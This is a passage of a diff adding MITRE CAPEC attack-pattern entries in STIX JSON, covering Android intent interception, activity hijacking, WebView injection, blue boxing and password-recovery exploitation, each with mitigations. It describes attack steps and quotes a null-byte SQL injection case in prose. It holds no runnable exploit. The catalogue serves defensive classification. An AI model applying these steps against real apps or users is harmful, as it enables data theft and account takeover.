"external_id": "CWE-925", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/925.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Intent Intercept", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents. They must also determine what the contents of the intents being sent are such that a malicious application can get sent these intents.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents from a target application

    2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter

  2. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Intercept Implicit Intents: Once the malicious app is downloaded, the android device will forward any implicit intents from the target application to the malicious application, allowing the adversary to gaina access to the contents of the intent. The adversary can proceed with any attack using the contents of the intent.

    2. Techniques
    Block the intent from reaching the desired location, causing a denial of service
    Gather sensitive information from the intercepted intent
    Modify the contents of the intent and forward along to another application
", + "x_capec_parent_of_refs": [ + "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4" + ], + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application is used to intercept implicit intents." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication.", + "id": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-499-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ede8d88a-2bc4-4188-a9d7-2dbbe7c96fb5", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2", + "spec_version": "2.1", + "target_ref": "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.\n \n This attack pattern is included in CAPEC for historical purposes.\n \n ", + "external_references": [ + { + "external_id": "CAPEC-5", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/5.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Blue Boxing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies a vulnerable CCITT-5 phone line, and sends a combination tone to the switch in order to request administrative access. Based on tone and timing parameters the request is verified for access to the switch. Once the adversary has gained control of the switch launching calls, routing calls, and a whole host of opportunities are available." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "System must use weak authentication mechanisms for administrative functions." + ], + "x_capec_resources_required": [ + "CCITT-5 or other vulnerable lines, with the ability to send tones such as combined 2,400 Hz and 2,600 Hz tones to the switch" + ], + "x_capec_skills_required": { + "Low": "Given a vulnerable phone system, the attackers' technical vector relies on attacks that are well documented in cracker 'zines and have been around for decades." + }, + "x_capec_status": "Obsolete", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Upgrade phone lines. Note this may be prohibitively expensive", + "id": "course-of-action--ad48d35a-8497-454e-a5b3-7ce3c8b75663", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-5-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--49c94014-b8f3-4700-b509-8b705cbfbb0c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad48d35a-8497-454e-a5b3-7ce3c8b75663", + "spec_version": "2.1", + "target_ref": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use strong access control such as two factor access control for administrative access to the switch", + "id": "course-of-action--3a64abb3-73d9-4d4b-b7d8-afda18b016a0", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-5-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9246fa28-1064-427d-b782-252991eab85a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3a64abb3-73d9-4d4b-b7d8-afda18b016a0", + "spec_version": "2.1", + "target_ref": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure.", + "external_references": [ + { + "external_id": "CAPEC-50", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/50.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-640", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/640.html" + }, + { + "description": "Advisory: Unauthorized password recovery in phpBannerExchange, 2006, RedTeam Pentesting GmbH", + "external_id": "REF-429", + "source_name": "reference_from_CAPEC", + "url": "http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt" + } + ], + "id": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Password Recovery Exploitation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker clicks on the \"forgot password\" and is presented with a single security question. The question is regarding the name of the first dog of the user. The system does not limit the number of attempts to provide the dog's name. An attacker goes through a list of 100 most popular dog names and finds the right name, thus getting the ability to reset the password and access the system.", + "\n phpBanner Exchange is a PHP script (using the mySQL database) that facilitates the running of a banner exchange without extensive knowledge of PHP or mySQL.\n A SQL injection was discovered in the password recovery module of the system that allows recovering an arbitrary user's password and taking over their account. The problem is due to faulty input sanitization in the phpBannerExchange, specifically the e-mail address of the user which is requested by the password recovery module.\n The e-mail address requested by the password recovery module on the resetpw.php page. That e-mail address is validated with the following regular expression:\n if(!eregi(\"^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,3})$\", $email)){\n \n A bug in the implementation of eregi() allows to pass additional character using a null byte \"\\0\". Since eregi() is implemented in C, the variable $email is treated as a zero-terminated string. All characters following the Null Byte will not be recognized by the regular expression. So an e-mail address can be provided that includes the special character \" ' \" to break the SQL query below (and it will not be rejected by the regular expression because of the null byte trick). So a SQL injection becomes possible:\n $get_info=mysql_query(\"select * from banneruser whereemail='$email' \");\n \n This query will return a non-zero result set even though the email supplied (attacker's email) is not in the database.\n Then a new password for the user is generated and sent to the $email address, an e-mail address controlled by the attacker. An attacker can then log in into the system.See also: CVE-2006-3013" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Understand the password recovery mechanism and how it works.

Exploit

  1. Find a weakness in the password recovery mechanism and exploit it. For instance, a weakness may be that a standard single security question is used with an easy to determine answer.

", + "x_capec_extended_description": "\n Most of them use only one security question. For instance, mother's maiden name tends to be a fairly popular one. Unfortunately in many cases this information is not very hard to find, especially if the attacker knows the legitimate user. These generic security questions are also re-used across many applications, thus making them even more insecure. An attacker could for instance overhear a coworker talking to a bank representative at the work place and supplying their mother's maiden name for verification purposes. An attacker can then try to log in into one of the victim's accounts, click on \"forgot password\" and there is a good chance that the security question there will be to provide mother's maiden name. A weak password recovery scheme totally undermines the effectiveness of a strong password scheme.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system allows users to recover their passwords and gain access back into the system.", + "Password recovery mechanism has been designed or implemented insecurely.", + "Password recovery mechanism relies only on something the user knows and not something the user has.", + "No third party intervention is required to use the password recovery mechanism." + ], + "x_capec_resources_required": [ + "For a brute force attack one would need a machine with sufficient CPU, RAM and HD." + ], + "x_capec_skills_required": { + "Low": "Brute force attack", + "Medium": "Social engineering and more sophisticated technical attacks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use multiple security questions (e.g. have three and make the user answer two of them correctly). Let the user select their own security questions or provide them with choices of questions that are not generic.", + "id": "course-of-action--5aefd1ed-4d4b-46a4-9523-4a9b10f1c157", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6da8ba67-d140-4a4f-9f59-04f18c0652dd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5aefd1ed-4d4b-46a4-9523-4a9b10f1c157", + "spec_version": "2.1", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "E-mail the temporary password to the registered e-mail address of the user rather than letting the user reset the password online.", + "id": "course-of-action--faa418c0-4283-4c6d-b462-3c7751003bae", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa9f80ff-b2df-47d3-9f28-3979f0827e13", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--faa418c0-4283-4c6d-b462-3c7751003bae", + "spec_version": "2.1", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that your password recovery functionality is not vulnerable to an injection style attack.", + "id": "course-of-action--17e33f25-5647-4186-9496-39840fbc7a3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--347ed834-4679-4e4c-9b81-cde8d3103190", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--17e33f25-5647-4186-9496-39840fbc7a3c", + "spec_version": "2.1", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.", + "external_references": [ + { + "external_id": "CAPEC-500", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/500.html" + }, + { + "external_id": "CWE-749", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/749.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + }, + { + "description": "Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, Heng Yin, Attacks on WebView in the Android System, 2011, Annual Computer Security Applications Conference (ACSAC)", + "external_id": "REF-430", + "source_name": "reference_from_CAPEC", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf" + } + ], + "id": "attack-pattern--3a089725-f495-452a-a40b-980898ec308c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "WebView Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target web application: An adversary first needs to determine what web application they wish to target.

    2. Techniques
    Target web applications that require users to enter sensitive information.
    Target web applications that an adversary wishes to operate on behalf of a logged in user.

Experiment

  1. Create malicious application: An adversary creates an application, often mobile, that incorporates a WebView component to display the targeted web application. This malicious application needs to downloaded by a user, so adversaries will make this application useful in some way.

    2. Techniques
    Create a 3rd party application that adds useful functionality to the targeted web application. Victims will download the application as a means of using the targeted web application.
    Create a fun game that at some point directs a user to the targeted web application. For example, prompt the user to buy in game currency by directing them to PayPal.

  2. Get the victim to download and run the application: An adversary needs to get the victim to willingly download and run the application.

    3. Techniques
    Pay for App Store advertisements
    Promote the application on social media, either through accounts made by the adversary or by paying for other accounts to advertise.

Exploit

  1. Inject malicious code: Once the victim runs the malicious application and views the targeted web page in the WebView component, the malicious application will inject malicious JavaScript code into the web application. This is done by using WebView's loadURL() API, which can inject arbitrary JavaScript code into pages loaded by the WebView component with the same privileges. This is often done by adding a script tag to the document body with a src destination to a remote location that serves malicious JavaScript code.

    2. Techniques
    Execute operations on the targeted web page on behalf of an authenticated user.
    Steal cookie information from the victim.
    Add in extra fields to the DOM in an attempt to get a user to divulge sensitive information.
", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the device and convince the user to execute it. The malicious application is designed to target a specific web application and is used to load the target web pages via the WebView component. For example, an adversary may develop an application that interacts with Facebook via WebView and adds a new feature that a user desires. The user would install this 3rd party app instead of the Facebook app." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this type of attack is to keep the malicious application off the system. There is nothing that can be done to the target application to protect itself from a malicious application that has been installed and executed.", + "id": "course-of-action--3bed61fa-d7ce-4833-8489-af735deb4503", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-500-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd4750af-dabe-4e24-954b-34c20912113b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3bed61fa-d7ce-4833-8489-af735deb4503", + "spec_version": "2.1", + "target_ref": "attack-pattern--3a089725-f495-452a-a40b-980898ec308c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts an implicit intent sent to launch a Android-based trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.", + "external_references": [ + { + "external_id": "CAPEC-501", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/501.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Activity Hijack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents to launch an Android-based trusted activity, and what that activity is.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents to launch an Adroid-based trusted activity. This malicious app will mimic the trusted activiy's user interface to get the user to enter sensitive data.

    2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter

  2. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Gather sensitive data through malicious app: Once the target application sends an implicit intent to launch a trusted activity, the malicious app will be launched instead that looks identical to the interface of that activity. When the user enters sensitive information it will be captured by the malicious app.

    2. Techniques
    Gather login information from a user using a malicious app
", + "x_capec_prerequisites": [ + "The adversary must have previously installed the malicious application onto the Android device that will run in place of the trusted activity." + ], + "x_capec_resources_required": [ + "Malware capable of acting on the adversary's objectives." + ], + "x_capec_skills_required": { + "High": "The adversary must typically overcome network and host defenses in order to place malware on the system." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An 'explicit intent' is delivered to a specific application as declared within the intent, whereas an 'implicit intent' is directed to an application as defined by the Android operating system. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly (i.e., with appropriate security controls).", + "id": "course-of-action--516fa894-49a7-4f72-93e4-a3f020c282a0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-501-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f8813501-20bf-40e5-8b15-3723c43763f4", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--516fa894-49a7-4f72-93e4-a3f020c282a0", + "spec_version": "2.1", + "target_ref": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Never use implicit intents for inter-application communication.", + "id": "course-of-action--38f1729a-f19a-4847-86b0-d6fbb1ef4247", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-501-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa086131-b814-4144-b0d9-847410959588", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38f1729a-f19a-4847-86b0-d6fbb1ef4247", + "spec_version": "2.1", + "target_ref": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component trusts the intent's action without verififcation, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact.", + "external_references": [ + { + "external_id": "CAPEC-502", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/502.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Intent Spoof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application will be used to issue spoofed intents." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To limit one's exposure to this type of attack, developers should avoid exporting components unless the component is specifically designed to handle requests from untrusted applications. Developers should be aware that declaring an intent filter will automatically export the component, exposing it to public access. Critical, state-changing actions should not be placed in exported components. If a single component handles both inter- and intra-application requests, the developer should consider dividing that component into separate components. If a component must be exported (e.g., to receive system broadcasts), then the component should dynamically check the caller's identity prior to performing any operations. Requiring Signature or SignatureOrSystem permissions is an effective way of limiting a component's exposure to a set of trusted applications. Finally, the return values of exported components can also leak private data, so developers should check the caller's identity prior to returning sensitive values.", + "id": "course-of-action--ba152037-676b-4900-8500-9e40f8772742", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-502-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65d8ac0a-e778-439d-a210-5233c586c56e", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba152037-676b-4900-8500-9e40f8772742", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView's addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.", + "external_references": [ + { + "external_id": "CAPEC-503", + "source_name": "capec", + "url": 